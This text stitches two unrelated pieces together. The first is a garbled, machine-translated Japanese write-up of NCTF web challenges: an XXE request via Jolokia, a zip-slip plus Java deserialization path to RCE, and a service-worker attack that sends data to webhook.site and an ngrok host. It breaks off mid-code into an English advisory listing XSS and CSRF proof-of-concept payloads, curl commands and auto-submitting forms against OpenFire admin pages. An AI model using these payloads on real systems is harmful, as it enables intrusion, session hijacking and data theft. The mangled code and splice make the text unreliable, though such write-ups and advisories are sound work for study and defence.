それで、私は後で添付ファイルを与えたので、私は地元で起動して、どのMBeanがそこにあるかを見ることができます。
には、ファイルを読み書きできるMbeanがあります。
com.sun.management:type=diagnosticcommand
このMbeanがリモート環境に存在するかどうかを判断します。
NOがある場合、返された画像は上記の写真です。いいえがある場合、返された画像は次の2つの状況です
Exp:
投稿/ユーザー/リストhttp/1.1
host: localhost:8080
user-agent: mozilla/5.0(windows nt 10.0; win64; x64; rv336094.0)gecko/20100101 firefox/94.0
Accept: Text/HTML、Application/XHTML+XML、Application/XML; Q=0.9、Image/Avif、Image/Webp、*/*; Q=0.8
Connection:閉じます
Cookie: jSessionId=4E8E18623EC2DEB1675E56DF895D33B
Content-Type:アプリケーション/XML
Content-Length: 194
?xmlバージョン='1.0'?
!doctype dy [
!エンティティDYシステム 'http://127.0.0.1:8080/Actuator/Jolokia/Exec/com.sun.management3:Type=DiagnosticCommand/CompilerDirectiveSadd/!/!/flag'
]
Iddy;/idcopyflag:
nctf {spring_actuator_and_jolokia_1s_so_fun_by_the_way_we1com3_to_join_api_security_community_yulige_yyds_wysb}
ezjava
質問者ID:pupi1
タイトル説明:
Dai教授は、2日間のファイル管理システムを開設しました。それが完成する前に、彼はハッカーに取り去られ、その中に何かを隠しました。
http://129.211.173.64:8080/html/index.html
http://129.211.173.64:8081/html/index.html
添付のリンク:
リンク:https://pan.baidu.com/s/1jb6kcy478ashrtxefjp1bq
抽出コード:NCTF
https://wwn.lanzoui.com/iamsdwyi0pe
https://ATTACHMENT.H4CK.FUN:9000/web/ezjava/nctf.war
flag3360
nctf {j3va_securlt9_ls_t0o_dlfficult}この質問は、JSPをサポートして任意のファイルを書き込むことをサポートしないRCE使用率です
前の部分では、最初にコードを監査します。 zipをアップロードしてから、減圧で見つけることができます。
圧縮されたパッケージファイルのファイルを確認しないため、解凍されたディレクトリの交差点につながる可能性があります。ここで、スクリプトを介してそのようなzipを生成できます。
zipfileをインポートします
OSをインポートします
__name__=='__main __' :の場合
try:
zipfile=zipfile.zipfile( 'poc.zip'、 'a'、zipfile.zip_deflated)
info=zipfile.zipinfo( 'poc.zip')
zipfile.write( 'poc.class'、 '././usr/local/tomcat/webapps/html/web-inf/classs/com/x1c/nctf/poc.class'、zipfile.zip_deflated)
zipfile.close()
e:としてのioerrorを除く
エコピーを上げると、私たちは今ではあらゆるファイルに書き込むのと同じくらい良いです。したがって、Spring Bootが実行されているときにRCEを取り除く方法の問題であり、ホット展開なしでJSPをサポートしていない(再起動プロセス中にJSPサポートが開かれているようですX___X)
実際、ここでは脱介入のためにバックドアが与えられています。ここのプロンプトは実際には非常に明白です。 ClassPathに悪意のあるクラスファイルを書くことができます。 Deserializationを通じて悪意のあるクラスにReadobjectメソッドをロードし、RCEを達成する方法。
質問によって与えられた添付ファイルは戦争であり、クラスパスを簡単に取得し、悪意のあるクラスをクラスパスに解凍し、バックドアの脱色を通してそれをトリガーするためのTomcatへの道もあります。 (Tomcatパスはデフォルトであり、パスをzipルートで確認できるため、Tomcatパスは最初にここに与えられませんでした。ただし、解決策がない場合は、ヒントを使用してマスターを促します:)
Exp:
パッケージcom.x1c.nctf;
java.io.*をインポートします。
java.io.serializableをインポートします。
com.x1c.nctf.tool。*;
パブリッククラスPOCはシリアル化可能な実装{
public poc(){
}
private void writeObject(objectInputStream out)IoException、classNotFoundException {
out.defaultreadobject();
}
private void readObject(objectInputStream in)IOException、classNotFoundException {
in.defaultreadobject();
runtime.getRuntime()。exec( 'touch /tmp/1.txt');
}
public static void main(string [] args)スロー例外{
poc o=new poc();
system.out.println(tool.base64encode(tool.serialize(o)));
}
}
backdoor?cmd=ro0abxnyabbjb20uedfjlm5jdgyuug9jltxeychkw8gcaab4ca==コピーシェルをリバウンドするだけです!
prettyjs
質問者ID:BYC_404
タイトル説明:
エクスプレステンプレートを提供する役に立たないウェブサイト…
link:https://prettyjs.bycsec404.top
添付のリンク:
リンク:https://pan.baidu.com/s/174wsqkqh08l-utnipr0uva
抽出コード:1TXC
https://ATTACHMENT.H4CK.FUN:9000/web/prettyjs/prettyjs.zip
https://nctf.slight-wind.com/web/prettyjs/prettyjs.zip
flag3360
nctf {eany_get_me_a_job_to_study_on_javascript:)}この質問の主な目的は、XSSのない /API /テンプレートの下でプレイヤーがXSを使用して機密情報を取得しない方法を調べることです。ただし、問題を展開する際の私の過失により、/API/テンプレートのデフォルトのコンテンツタイプはText/HTMLです。 csrf=xss orzを直接実行できます。ここのコンテンツタイプはテキスト/プレーンである必要があると予想されます。
これが予想されるアイデアプロセスです:
コードを監査した後、Cookieを構築する必要があり、Cookieに必要なadmin_usernameとcookie_secretは、 /api /テンプレートルートのadmin botのテンプレートコンテンツに由来することがわかります。
ただし、理論的には、サイトにはXSがないため、出発点は次のとおりです。ボットに独自のサーバーにアクセスし、トピックWebサイトにクロスドメインリクエストを行うことができます。
クロスドメインには、SOP(同じ起源ポリシー)の制限が必要です。タイトルのCookie Samesite属性は誰にも設定されていないため、Cookieはサーバーのドメインでまだ有効になりますが、Fetch、xmlhttprequest、その他の手段を介してSOPによって制限されます。リクエストは送信されますが、返信はJavaScriptが返された後に取得されません。
同時に、サーバー上の参照チェックもあります。
ここでの参照チェックは、実際には多くの主流のWebサービス/ミドルウェアがJSONP、ビデオアドレス、その他のインターフェイスの参照者をチェックする手段です。参照ヘッダーがある場合は、それが当社からあるかどうかを判断します。ただし、このような検査方法をバイパスするのは非常に簡単です。参照者を持参しないでください。
したがって、重要なのは、ドメイン間でロードして戻り値を取得することです。 JSをドメイン間でロードするときにSOPによってスクリプトが制限されないことを知っています。また、その返品コンテンツも制御範囲内にあることがわかっています。しかし、ここでスクリプトで解決する必要がある2つの問題があります
/API/テンプレートコンテンツは、JS/API/テンプレートだけではありません。それはポストルートです。これら2つの問題を順番に解決します。
最初の質問は、まず、 /API /テンプレートのコンテンツが制御可能なuserame+の素晴らしいエキスパートページで構成されていることです。以下を確認しますか? ExpressJSの単純なコード。コードの次の部分は、当然合法的なJSコードです。最初の部分はどうですか?最初の行がコメントアウトされている限り、ページ全体のコンテンツが合法的なJSであるということは本当ですか?
答えはイエスです。ただし、ここではユーザー名が制限されており、使用できません /。 //または /*は使用できません。ただし、フロントエンドでJSの別のコメント方法を使用して、最初の行をコメントします。これにより、 /API /テンプレートのコンテンツ全体がJSになります。
2番目の質問は、スクリプトのロードコンテンツを投稿する方法です。ここでの私のアプローチは、サービスワーカーを使用して /API /テンプレートにリクエストを変更することです。サービスワーカーはブラウザサイドエージェントと同等であることがわかっているため、自然に投稿することができます。次に、最終的なソリューションが明らかになります。
サービスワーカーを登録したいので、HTTPサービスを提供するようにノードサーバーをローカルにセットアップし、NGROKを使用して一時的なHTTPSドメイン名を取得します。その中で、SW.JSは、get to postから /api /テンプレートに送信されたリクエストメソッドを変更します。
server.js
const express=require( 'express');
const app=express();
const logger=require( 'morgan');
app.use(logger( 'dev'));
app.get( '/'、(_、res)={
REST res.sendfile(__ dirname + '/solve.html');
})
app.get( '/exp'、(_、res)={
REST res.sendfile(__ dirname + '/exp.html');
})
app.get( '/sw.js'、(_、res)={
Res.Type( 'Application/JavaScript');
RETURN RES.SEND( `self.addeventlistener( 'fetch'、(event)={
event.respondwith((async())={
それをしましょう;
if(event.request.url.includes( 'Template')){
resp=await fetch(event.request、{
Method: 'post'、
headers: {
'content-type':'アプリケーション/x-www-form-urlencoded '
}、
body: 'username=! - '、
ReferRerPolicy: 'no-referrer'
});
RETURN REST;
} それ以外{
return await fetch(event.request);
}
})());
}); `)
})
app.listen(9000)copysolve.html。サービスワーカーを登録するために使用されます
!doctype html
HTML
頭
TitleSolve/Title
スクリプト
if( 'serviceworker' in Navigator){
window.addeventlistener( 'load'、()={
const sw='https://6ad8-47-94-110-102.ngrok.io/sw.js';
navigator.serviceworker.register(sw、{scope: '/'})
.then((register)={
navigator.sendbeacon( 'https://webhook.site/E708EB94-EA07-490A-969A-742D40033925'、「登録」);
setimeout(()={
window.open( '/exp')
}、100);
}、(err)={
navigator.sendbeacon( 'https://webhook.site/e708eb94-ea07-490a-969a-742d40033925'、 '登録失敗');
console.log( 'Service Worker error:'、err);
});
});
}
/スクリプト
/頭
体
BYC_404はこれを手に入れました
/体
/htmlcopyexp.html。ロード /API /テンプレートとadmin_usernameとcookie_secretをフックから取得します。ここでは、主にいくつかの関数を書き換えて追加して、NodeJSの下のコードをまだ合法化してフロントエンドJSに入れます。同時に、取得したいコンテンツステートメントは、global.process.env.admin_username.setflag(cookie_secret)です。プロキシを使用してHookGlobalを使用してプロパティにアクセスしたり、メソッドを呼び出したりすることができます。
体
スクリプト
const target='https://prettyjs.bycsec404.top';
const script=document.createelement( 'script');
script.referrerpolicy='no-referrer';
script.src=ターゲット + '/api/テンプレート'
document.body.AppendChild(スクリプト);
const require=(module)={
if(module=='Express'){
return()={
戻る {
use:()={}、
all:()={}、
聞きます:()={}、
get:(data、func)={
object.prototype.global=new Proxy({}、Handler);
func( 'byc_404'、{send:()={}});
# Several vulnerabilities doscovered in OpenFire version 3.10.2 to 4.0.1
## Product Description
**OpenFire** is an opensource project under GNU GPL licence. It provides a Jabber/XMPP server fully develloped in Java. It's develloped by the **Ignite realtime** community.
The actual version of the product is 4.0.2.
Official web site : http://igniterealtime.org/
Several vulnerabilities have been discovered between 2015, October and 2016, February.
Reported vulnerabilities are similar to those previously discovered by hyp3rlinx, although they concern different pages.
In brief, the flaws are of the following kinds: CSRF, XSS (reflected and stored), file upload and information disclosure. Most vulnerabilities need an administration access to the web application and may lead to personal information leakage or account take-over.
**Ingnite realtime** fixed some vulnerabilities (the corresponding commit ID are indicated in this document).
## Several Relected XSS Vulnerabilities identified in Openfire 3.10.2
**Access Vector**: remote
**Security Risk**: low
**Vulnerability**: CWE-79
**CVSS Base Score**: 5.2
[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N/E:F/RL:O
### Vulnerability Description
Several XSS vulnerabilities have been found on several pages of the administration panel. Reflected XSS may lead to session hijacking on admin user.
### Proof of Concept
#### *domain* and *remotePort* variables from *server2server-settings.jsp*
The following POST values can be sent to trigger the vulnerability:
```
domain=%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&remotePort=5269&serverAllowed=Add+Server
```
or
```
domain=testt&remotePort=5269%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverAllowed=Add+Server
```
or
```
domain=%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverBlocked=Block+Server
```
You can reproduce the exploitation with the following curl commands:
```
curl --data "domain=%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&remotePort=5269&serverAllowed=Add+Server" https://OpenFireServerIP:9090/server2server-settings.jsp --cookie="JSESSIONID=XXX"
curl --data "domain=test&remotePort=5269%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverAllowed=Add+Server" https://OpenFireServerIP:9090/server2server-settings.jsp --cookie="JSESSIONID=XXX"
curl --data "domain=%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverBlocked=Block+Server" https://OpenFireServerIP:9090/server2server-settings.jsp --cookie="JSESSIONID=XXX"
```
#### *criteria* variable from *plugins/search/advance-user-search.jsp*
The following GET request exploits the XSS vulnerability:
```
http://OpenFireServerIP:9090/[[http://OpenFireServerIP:9090/plugins/search/advance-user-search.jsp?search=true&moreOptions=false&criteria=admin%22/%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&search=Search
```
## Several stored XSS Vulnerabilities identified in Openfire 3.10.2
**Access Vector**: remote
**Security Risk**: low
**Vulnerability**: CWE-79
**CVSS Base Score**: 5.5
[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N/E:F/RL:O
### Vulnerability Description
Several XSS vulnerabilities have been found on several pages of the administration panel. Stored XSS could lead to session hijacking on admin user.
### Proof of Concept
#### *mucdesc* variable from *muc-service-edit-form.jsp*
The following POST values can be sent to trigger the vulnerability:
```
save=true&mucname=test&mucdesc=test%22%2F%3E%3Cscript%3Ealert%28%27XSS-2%27%29%3C%2Fscript%3E
```
The following code allows the creation of a web frame exploiting the vulnerability:
```
<iframe style="display:none" name="xss-frame"></iframe>
<form id="xss-form" action="http://OpenFireServerIP:9090/muc-service-edit-form.jsp" >
<input type="text" name="save" value="true" >
<input type="text" name="mucname" value="test" >
<input type="text" name="mucdesc" value="%22/><script>alert('XSS')</script>" >
</form>
<script>document.getElementById("xss-form").submit()</script>
```
or with this curl command:
```
curl --data "save=true&mucname=test&mucdesc=test%22%2F%3E%3Cscript%3Ealert%28%27XSS-2%27%29%3C%2Fscript%3E" https://OpenFireServerIP:9090/muc-service-edit-form.jsp --cookie="JSESSIONID=XXX"
```
#### *searchname* variable from *plugins/search/search-props-edit-form.jsp*
The following POST values can be sent to trigger the vulnerability:
```
searchEnabled=true&searchname=search%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groupOnly=false
```
The following code allows the creation of a web frame exploiting the vulnerability:
```
<iframe style="display:none" name="xss-frame"></iframe>
<form id="xss-form" action="http://OpenFireServerIP:9090/plugins/search/search-props-edit-form.jsp?save" method="post" target="xss-frame" >
<input type="text" name="searchEnabled" value="true" >
<input type="text" name="searchname" value="search%22/><script>alert('XSS')</script>" >
<input type="text" name="groupOnly" value="false" >
</form>
<script>document.getElementById("xss-form").submit()</script>
```
or with this curl command:
```
curl "http://OpenFireServerIP:9090/plugins/search/search-props-edit-form.jsp" --data="searchEnabled=true&searchname=%22/%3E%3Cscript%3Ealert('XSS')%3C/script%3E&groupOnly=false" --cookie="JSESSIONID=XXX"
```
#### *searchname* variable from *page plugins/search/search-props-edit-form.jsp*
The following POST values can be sent to trigger the vulnerability:
```
propName=adminConsole.port&propValue=9090%22+onmouseover%3D%22alert%28%27xxs%27%29%22+x%3D%22&encrypt=false&save=Save+Property
```
The following code allows the creation of a web frame exploiting the vulnerability:
```
<iframe style="display:none" name="xss-frame"></iframe>
<form id="xss-form" action="http://OpenFireServerIP:9090/server-properties.jsp" method="post" target="xss-frame" >
<input type="text" name="propValue" value="=adminConsole.port" >
<input type="text" name="searchname" value="9090%22 onmouseover=%22alert('XSS')%22 x="/>
<input type="text" name="encrypt" value="false" >
<input type="text" name="save" value="Save Property" >
</form>
<script>document.getElementById("xss-form").submit()</script>
```
or with this curl command:
```
curl --data "searchEnabled=true&searchname=search%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groupOnly=false" https://OpenFireServerIP:9090/plugins/search/search-props-edit-form.jsp --cookie="JSESSIONID=XXX"
```
#### *serverName* variable from *plugins/search/search-props-edit-form.jsp*
The following POST values can be sent to trigger the vulnerability:
```
serverName=localhost.localdomain%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverPort=5269&componentPort=5275&port=5222&sslEnabled=true&sslPort=5223&embeddedPort=9090&embeddedSecurePort=9091&jmxEnabled=false&jmxSecure=true&jmxPort=1099&save=Save+Properties
```
The following code allows the creation of a web frame exploiting the vulnerability:
```
<iframe style="display:none" name="xss-frame"></iframe>
<form id="xss-form" action="http://OpenFireServerIP:9090/server-props.jsp" method="post" target="xss-frame" >
<input type="text" name="serverName" value="localhost.localdomain%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E" >
<input type="text" name="serverPort" value="5269" >
<input type="text" name="componentPort" value="5275" >
<input type="text" name="port" value="5222" >
<input type="text" name="sslEnabled" value="true" >
<input type="text" name="sslPort" value="5223" >
<input type="text" name="embeddedPort" value="9090" >
<input type="text" name="embeddedSecurePort" value="9091" >
<input type="text" name="jmxEnabled" value="false" >
<input type="text" name="jmxSecure" value="true" >
<input type="text" name="jmxPort" value="1099" >
<input type="text" name="save" value="Save+Properties" >
</form>
<script>document.getElementById("xss-form").submit()</script>
```
or with this curl command:
```
curl --data "serverName=localhost.localdomain%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverPort=5269&componentPort=5275&port=5222&sslEnabled=true&sslPort=5223&embeddedPort=9090&embeddedSecurePort=9091&jmxEnabled=false&jmxSecure=true&jmxPort=1099&save=Save+Properties" https://OpenFireServerIP:9090/server-props.jsp --cookie="JSESSIONID=XXX"
```
### Affected versions
* Version >= 3.10.2 and < 4.0.0
## Several Relected XSS Vulnerabilities identified in Openfire 4.0.0 and 4.0.1
**Access Vector**: remote
**Security Risk**: low
**Vulnerability**: CWE-79
**CVSS Base Score**: 5.2
[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N/E:F/RL:O
### Vulnerability Description
Several XSS vulnerabilities have been found on several pages of the administration panel. Reflected XSS could lead to session hijacking against an administrator.
Some of these vulnerabilities have already been found by hyp3rlinx, but had not been patched properly.
### Proof of Concept
#### *groupchatName*, *groupchatJID*, *users* and *groups* variables from *page create-bookmark.jsp* suffer from the vulnerability
The following POST values can be sent to trigger the vulnerability:
```
groupchatName=%22%3E%3Cscript%3Ealert%28%27XSS1%27%29%3C%2Fscript%3E&groupchatJID=%22%3E%3Cscript%3Ealert%28%27XSS2%27%29%3C%2Fscript%3E%C2%B2&users=%22%3E%3Cscript%3Ealert%28%27XSS3%27%29%3C%2Fscript%3E&groups=%22%3E%3Cscript%3Ealert%28%27XSS4%27%29%3C%2Fscript%3E&createGroupchatBookmark=Create&type=groupchat
```
The following curl command allows reproducing the attack against the Openfire *plugins/bookmarks/create-bookmark.jsp* page:
```
curl --data "save=true&mucname=conference&mucdesc=Public+Chatrooms%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E" https://OpenFireServerIP:9090/muc-service-edit-form.jsp --cookie="JSESSIONID=XXX"
```
#### *search* variable from *group-summary.jsp*
The following GET request exploit the XSS vulnerability:
```
http://OpenFireServerIP:9090/group-summary.jsp?search=test%22+onmouseover%3Dalert%28%27XSS%27%29+x%3D%22
```
The following curl command allows reproducing the attack against the Openfire *group-summary.jsp* page.
```
curl http://OpenFireServerIP:9090/group-summary.jsp?search=test%22+onmouseover%3Dalert%28%27XSS%27%29+x%3D%22 --cookie="JSESSIONID=XXX"
```
#### *maxTotalSize*, *maxFileSize*, *maxDays*, *logTimeout* variables from *audit-policy.jsp*
The following GET request exploit the XSS vulnerability:
```
http://OpenFireServerIP:9090/audit-policy.jsp?auditEnabled=false&logDir=%2Fopt%2Fopenfire%2Flogs&maxTotalSize=1000%22%3E%3Cscript%3Ealert%28%27XSS3%27%29%3C%2Fscript%3E&maxFileSize=10%22%3E%3Cscript%3Ealert%28%27XSS4%27%29%3C%2Fscript%3E&maxDays=-1%22%3E%3Cscript%3Ealert%28%27XSS5%27%29%3C%2Fscript%3E&logTimeout=120%22%3E%3Cscript%3Ealert%28%27XSS6%27%29%3C%2Fscript%3E&ignore=&update=Save+Settings
```
The following curl command allows reproducing the attack against the Openfire *audit-policy.jsp* page:
```
curl "http://OpenFireServerIP:9090/audit-policy.jsp?auditEnabled=false&logDir=%2Fopt%2Fopenfire%2Flogs&maxTotalSize=1000%22%3E%3Cscript%3Ealert%28%27XSS3%27%29%3C%2Fscript%3E&maxFileSize=10%22%3E%3Cscript%3Ealert%28%27XSS4%27%29%3C%2Fscript%3E&maxDays=-1%22%3E%3Cscript%3Ealert%28%27XSS5%27%29%3C%2Fscript%3E&logTimeout=120%22%3E%3Cscript%3Ealert%28%27XSS6%27%29%3C%2Fscript%3E&ignore=&update=Save+Settings" --cookie="JSESSIONID=XXX"
```
#### *passPhrase* variables from *import-keystore-certificate.jsp*
The following POST values exploit the XSS vulnerability:
```
passPhrase=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&privateKey=test&certificate=test&save=Save
```
The following curl command allows reproducing the attack against the Openfire *import-keystore-certificate.jsp* page.
```
curl http://OpenFireServerIP:9090/import-keystore-certificate.jsp --data="passPhrase=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&privateKey=test&certificate=test&save=Save" --cookie="JSESSIONID=XXX"
```
#### *criteria* variable from */plugins/search/advance-user-search.jsp*
The following GET request exploit the XSS vulnerability:
```
http://OpenFireServerIP:9090/plugins/search/advance-user-search.jsp?search=true&moreOptions=false&criteria=admin%22/%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&search=Search
```
The following curl command allows reproducing the attack against the Openfire *plugins/search/advance-user-search.jsp* admin page.
```
curl "http://OpenFireServerIP:9090/plugins/search/advance-user-search.jsp?search=true&moreOptions=false&criteria=admin%22/%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&search=Search" --cookie="JSESSIONID=XXX"
```
### Affected versions
* Version 4.0.0 and 4.0.1
## Several stored XSS Vulnerabilities identified in Openfire 4.0.0 and 4.0.1
Some of these vulnerabilities have already been found by hyp3rlinx, but has not been patched since.
**Access Vector**: remote
**Security Risk**: low
**Vulnerability**: CWE-79
**CVSS Base Score**: 5.5
[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N/E:F/RL:O
### Vulnerability Description
Several XSS vulnerabilities have been found on several pages of the administration panel. Stored XSS could lead to session hijacking on admin user.
### Proof of Concept
#### *subdomain* variable from *connection-settings-external-components.jsp*
The following curl command allows reproducing the attack against the Openfire *connection-settings-external-components.jsp* page:
```
curl --data "subdomain=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&secret=toto&componentAllowed=Add+Component" https://OpenFireServerIP:9090/connection-settings-external-components.jsp --cookie="JSESSIONID=XXX"
```
Or
```
curl --data "subdomain=%22%3Escript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&componentBlocked=Block+Component" https://OpenFireServerIP:9090/connection-settings-external-components.jsp --cookie="JSESSIONID=XXX"
```
#### *mucdesc* variable from *muc-service-edit-form.jsp*
The following curl command allows reproducing the attack against the Openfire *muc-service-edit-form.jsp* page:
```
curl --data "groupchatName=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groupchatJID=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%C2%B2&users=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groups=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&createGroupchatBookmark=Create&type=groupchat" https://OpenFireServerIP:9090/plugins/bookmarks/create-bookmark.jsp --cookie="JSESSIONID=XXX"
```
#### *groupchatName*, *groupchatJID*, *users* and *groups* variables from page muc-service-edit-form.jsp
The following curl command allows reproducing the attack against the Openfire *muc-service-edit-form.jsp* page:
```
curl --data "groupchatName=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groupchatJID=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%C2%B2&users=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groups=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&createGroupchatBookmark=Create&type=groupchat" https://OpenFireServerIP:9090/plugins/bookmarks/create-bookmark.jsp --cookie="JSESSIONID=XXX"
```
#### *searchname* variable from *plugins/search/search-props-edit-form.jsp*
The following curl command allows reproducing the attack against the Openfire *plugins/search/advance-user-search.jsp* page:
```
curl "http://OpenFireServerIP:9090/plugins/search/advance-user-search.jsp?search=true&moreOptions=false&criteria=admin%22/%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&search=Search" --cookie="JSESSIONID=XXX"
```
The folling code allows exploiting the vulnerability:
```
<iframe style="display:none" name="xss-frame"></iframe>
<form id="xss-form" action="http://OpenFireServerIP:9090/plugins/search/search-props-edit-form.jsp?save" method="post" target="xss-frame" >
<input type="text" name="searchEnabled" value="true" >
<input type="text" name="searchname" value="search%22/><script>alert('XSS')</script>" >
<input type="text" name="groupOnly" value="false" >
</form>
<script>document.getElementById("xss-form").submit()</script>
```
#### *propValue* variable from *server-properties.jsp*
The following curl command allows reproducing the attack against the Openfire *server-properties.jsp* page:
```
curl --data="propName=adminConsole.port&propValue=9090%22+onmouseover%3D%22alert%28%27xxs%27%29%22+x%3D%22&encrypt=false&save=Save+Property" http://OpenFireServerIP:9090/server-properties.jsp --cookie="JSESSIONID=XXX"
```
The folling code allows exploiting the vulnerability:
```
<iframe style="display:none" name="xss-frame"></iframe>
<form id="xss-form" action="http://OpenFireServerIP:9090/server-properties.jsp" method="post" target="xss-frame" >
<input type="text" name="propValue" value="=adminConsole.port" >
<input type="text" name="searchname" value="9090%22 onmouseover=%22alert('XSS')%22 x="/>
<input type="text" name="encrypt" value="false" >
<input type="text" name="save" value="Save Property" >
</form>
<script>document.getElementById("xss-form").submit()</script>
```
###Affected versions
* Version 4.0.0 and 4.0.1
## Several CSRF Vulnerabilities identified in Openfire 3.10.2
**Access Vector**: remote
**Security Risk**: low
**Vulnerability**: CWE-312
**CVSS Base Score**: 5.4
[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N/E:F/RL:O
### Vulnerability Description
Several CSRF vulnerabilities have been found on different pages of the admin panel of the OpenFire web server. Throught this attack an attacker could drive a valid user to execute unwittingly a request on the OpenFire sever.
### Proof of Concept
#### *connection-settings-external-components.jsp* page is vulerable to a CSRF attack.
The following HTML iframe command allows reproducing the attack against the Openfire *dwr/exec/downloader.installPlugin.dwr* page:
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/dwr/exec/downloader.installPlugin.dwr" method="post" target="csrf-frame" >
<input type="text" name="callCount" value="1" >
<input type="text" name="c0-scriptName" value="downloader" >
<input type="text" name="c0-methodName" value="installPlugin" >
<input type="text" name="c0-id" value="9033_1444939787005" >
<input type="text" name="c0-param0" value="string:http://www.igniterealtime.org/projects/openfire/plugins/broadcast.jar" >
<input type="text" name="c0-param1" value="string:8221154" >
<input type="text" name="xml" value="true" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
```
#### *client-connections-settings.jsp* is vulerable to a CSRF attack.
The following HTML iframe command allows reproducing the attack against the Openfire *client-connections-settings.jsp* page:
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/client-connections-settings.jsp" method="post" target="csrf-frame" >
<input type="text" name="port" value="5222" >
<input type="text" name="sslEnabled" value="false" >
<input type="text" name="sslPort" value="5223" >
<input type="text" name="idleDisco" value="true" >
<input type="text" name="clientIdle" value="360" >
<input type="text" name="pingIdleClients" value="true" >
<input type="text" name="update" value="Save Settings" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
```
#### *manage-updates.jsp* is vulerable to a CSRF attack.
The following HTML iframe command allows reproducing the attack against the *Openfire manage-updates.jsp* page:
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/manage-updates.jsp" method="post" target="csrf-frame" >
<input type="text" name="serviceEnabled" value="false" >
<input type="text" name="notificationsEnabled" value="false" >
<input type="text" name="proxyEnabled" value="true" >
<input type="text" name="proxyHost" value="10.0.0.1" >
<input type="text" name="proxyPort" value="6666" >
<input type="text" name="update" value="Save Settings" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
```
#### *plugin-admin.jsp* is vulerable to a CSRF attack.
The following HTML iframe command allows reproducing the attack against the Openfire *plugin-admin.jsp* page.
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/plugin-admin.jsp" method="get" target="csrf-frame" >
<input type="text" name="deleteplugin" value="broadcast" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
```
The following HTML iframe command allows reproducing the attack against the Openfire *reg-settings.jsp* page:
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/reg-settings.jsp" method="get" target="csrf-frame" >
<input type="text" name="inbandEnabled" value="false" >
<input type="text" name="canChangePassword" value="false" >
<input type="text" name="anonLogin" value="fasle" >
<input type="text" name="allowedIPs" value="0.0.0.0" >
<input type="text" name="allowedAnonymIPs" value="0.0.0.0" >
<input type="text" name="save" value="Save Settings" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
```
#### *server-properties.jsp* is vulerable to a CSRF attack.
The following HTML iframe command allows reproducing the attack against the Openfire *server-properties.jsp* admin page.
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/server-properties.jsp" method="post" target="csrf-frame" >
<input type="text" name="propName" value="test" >
<input type="text" name="propValue" value="test" >
<input type="text" name="encrypt" value=""false >
<input type="text" name="save" value="Save Property" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
```
#### *system-email.jsp* is vulerable to a CSRF attack.
The following HTML iframe command allows reproducing the attack against the Openfire *system-email.jsp* admin page.
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/system-email.jsp" method="post" target="csrf-frame" >
<input type="text" name="host" value="mail.google.com" >
<input type="text" name="port" value="25" >
<input type="text" name="debug" value="false" >
<input type="text" name="server_username" value="toto" >
<input type="text" name="server_password" value="toto" >
<input type="text" name="save" value="Save Changes" >
</form>
```
### Affected versions
* Version >= 3.10.2 and < 4.0.0
## Several CSRF Vulnerabilities identified in Openfire 3.10.2
